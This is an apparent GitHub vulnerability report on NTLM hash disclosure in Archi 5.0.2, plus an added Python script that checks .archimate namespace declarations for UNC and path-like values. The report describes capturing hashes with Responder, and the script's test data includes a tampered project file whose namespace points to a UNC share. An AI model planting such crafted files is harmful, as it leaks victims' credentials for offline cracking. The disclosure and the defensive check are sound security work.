NTLM Hash Disclosure (v5.0.2) #946
Comments
Thanks for the report. This is under investigation.
Phillipus added a commit that referenced this issue on Jul 14, 2023
This will be addressed in the next version of Archi. Thanks.
Fixed in Archi 5.1 beta 2.
Thanks for the quick response! 💪
Version of Archi
5.0.2
Description
When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest accounts, the host will try to authenticate on the share using the current user's session.
Impact
A malicious user can capture the NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.
Technical fix
Do not allow the application’s functionality to resolve or load UNC paths.
Technical Details
“archimate” projects are saved as XML files using the extension .archimate. The example below is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is placed on the diagram “Default View” (linked by the ID e79145c...).
The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC path is provided, the host will try to access the share drive and, if need be, try to authenticate.
In the following example, the attacker is running the Responder tool (Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \\172.16.227.1\share\archimate.
Whenever the victim opens the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.
As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.
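The report's fix is to stop the loader from resolving UNC paths at all. As an added defensive check (example code, not Archi's own implementation), the script below scans an .archimate file's namespace declarations before the file is handed to a full loader and rejects any xmlns value that is path-like (UNC, file:/smb: URL, drive letter) or that does not match the expected URI for a known prefix. The expat parser used here only reports attribute strings; it does not fetch namespace URIs or external entities. The two sample files, the 192.0.2.10 address and the element IDs are constructed for this example; the expected archimate namespace URI is the one quoted in the report.

```python
"""Pre-load namespace validation for .archimate files (added example, not Archi code)."""
import re
import xml.parsers.expat

# Namespace URIs we expect for well-known prefixes. The archimate URI is the
# one named in the report; the xsi URI is the standard XML Schema instance URI.
EXPECTED_NAMESPACES = {
    "archimate": "http://www.archimatetool.com/archimate",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}

# Values a defender should treat as a network/file reference rather than an
# opaque namespace identifier: UNC paths (\\host\share), protocol-relative
# //host paths, file: and smb: URLs, and Windows drive-letter paths.
UNSAFE_NS_RE = re.compile(r"^(\\\\|//|file:|smb:|[a-zA-Z]:[\\/])", re.IGNORECASE)


def collect_namespace_declarations(xml_bytes):
    """Return [(prefix, uri), ...] for every xmlns / xmlns:prefix attribute.

    ParserCreate() without a namespace separator leaves xmlns attributes as
    ordinary attributes, so we can read their raw values without expat doing
    any namespace processing (and expat never dereferences the URI).
    """
    decls = []

    def start_element(name, attrs):
        for attr_name, value in attrs.items():
            if attr_name == "xmlns":
                decls.append(("", value))
            elif attr_name.startswith("xmlns:"):
                decls.append((attr_name[len("xmlns:"):], value))

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start_element
    parser.Parse(xml_bytes, True)
    return decls


def find_unsafe_namespaces(xml_bytes):
    """Return [(prefix, uri, reason), ...] for every namespace declaration to reject."""
    findings = []
    for prefix, uri in collect_namespace_declarations(xml_bytes):
        if UNSAFE_NS_RE.match(uri):
            findings.append((prefix, uri, "path-like namespace URI"))
            continue
        expected = EXPECTED_NAMESPACES.get(prefix)
        if expected is not None and uri != expected:
            findings.append((prefix, uri, "unexpected URI for prefix %r" % prefix))
    return findings


def is_safe_to_load(xml_bytes):
    """True when no namespace declaration in the file is path-like or unexpected."""
    return not find_unsafe_namespaces(xml_bytes)


# Constructed minimal .archimate model with one BusinessActor (benign).
BENIGN_SAMPLE = rb"""<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="http://www.archimatetool.com/archimate"
    name="Sample" id="id-model-0001" version="5.0.2">
  <folder name="Business" id="id-folder-0001" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-elem-0001"/>
  </folder>
</archimate:model>
"""

# Same model with the archimate namespace redirected to a UNC share
# (constructed; 192.0.2.10 is an RFC 5737 documentation address).
TAMPERED_SAMPLE = rb"""<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="\\192.0.2.10\share\archimate"
    name="Sample" id="id-model-0001" version="5.0.2">
  <folder name="Business" id="id-folder-0001" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-elem-0001"/>
  </folder>
</archimate:model>
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(label, "safe" if is_safe_to_load(sample) else find_unsafe_namespaces(sample))
```

The check is deliberately a string comparison: the point of the report is that resolving a namespace value as a resource is what triggers the outbound SMB authentication, so a validation layer must never dereference the URI itself. The regex also rejects `//host/share` and drive-letter forms so that a value a Windows path API would still interpret as a network or local path cannot slip past a UNC-only check.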